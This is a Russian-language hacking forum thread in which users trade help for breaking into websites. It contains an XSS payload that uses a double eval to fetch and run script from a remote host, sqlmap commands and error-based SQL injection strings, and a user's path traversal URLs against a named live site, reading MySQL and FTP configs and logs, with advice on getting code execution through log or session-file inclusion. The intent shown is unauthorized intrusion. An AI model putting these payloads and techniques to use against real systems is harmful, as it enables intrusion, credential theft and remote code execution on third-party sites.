Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    HTML:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p>
    нужно дважды евалить
    HTML:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" /></p>
    первый eval() выполняет код из name, то есть получает твой payload, а второй eval() уже выполняет данный payload
     
    Octavian likes this.
  2. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Вопрос по SQL injection
    Code:
    GET /getaddr.cgi?heataccount=%5c
    [​IMG]
    Code:
     -u https://site.com/getaddr.cgi?heataccount=1%5c --dbs --no-cast --random-agent --dbms=mysql -v5 --level 2 --risk 3
    Code:
     -u https://site.com/getaddr.cgi?heataccount=%5c -p heataccount --dbs --no-cast --random-agent --level 2 --risk 3
    
    Не катит он тупа не видит
    Как раскрутить кто знает ?
     
  3. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    Руками может?
     
    cat1vo likes this.
  4. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    level=5 попробуй в мапе, ну и руками error based вектор пробуй.
    Code:
    /getaddr.cgi?heataccount=1" and extractvalue(0x0a,concat(0x0a,(database()))--
    /getaddr.cgi?heataccount=1" and updatexml(NULL,concat(0x3a,(database())),Null)--
    
     
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    100500 waf
     
  6. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    Try boolean-based via more than 1 row )
     
  7. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  8. MotherHacker

    MotherHacker New Member

    Joined:
    14 Oct 2017
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
  9. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.

    Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
    Code:
    https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
    Что нашел:
    - конфиг мускула
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
    - конфиг фтп
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
    - логи фтп (не нашел подключения)
    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
    https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
    Что не могу найти:
    - логи апача
    - способ залиться
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    чёт не фурычит сайт )
     
  11. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    С СНГ IP может не пускать.

    Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)
     
  12. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Ниразу не LFI, это читалка. На чтение логов нет прав.
     
    z3u5 and erwerr2321 like this.
  13. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера.
    Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
     
  14. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,249
    Reputations:
    148
    код должен выполняться?
     
    z3u5 likes this.
  15. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты?
    Я не в теме, пишу без наездов, вам все кажется.
     
  16. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    С большой долей вероятности можно определить исходя из контекста. В этом случае, по URI видно, что используется некий функционал галереи, а по заголовкам можно понять, что отдаётся содержимое файла:

    Code:
    Content-Disposition: inline; filename=""
    Content-Length: 0
    Connection: close
    Content-Type: image/jpeg
    
    Но если какие либо внешние факторы отсутствуют, то да, нужно подтверждать экспериментально.

    Читалка/инклуд на доступ к логам не влияют. Зависит от настроек системы и текущего пользователя.
     
    z3u5 likes this.
  17. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Либо прочитать любой PHP скрипт :D

    Code:
    https://www.enature.net/nudist_gallery/full_image/?page=/../index.php
    
     
    z3u5 likes this.
  18. z3u5

    z3u5 New Member

    Joined:
    30 Jun 2013
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Спасибо, я гуманитарий просто. А если нет доступа к логам - как выглядит процесс запуска своего кода, через сеансы?
     
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Для этого
    1) должен быть инклуд
    2) не должно быть расширение(или его можно откинуть)
    3) должен знать имя своего сеансового файла
    site.ru/?page=../../../../../../var/log/sess_file
    ____________________________________________________________________________
     
    z3u5 and crlf like this.
  20. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Сегодня день инклудов :) В этом посте есть ссылка, на хороший материал.
     
    z3u5 likes this.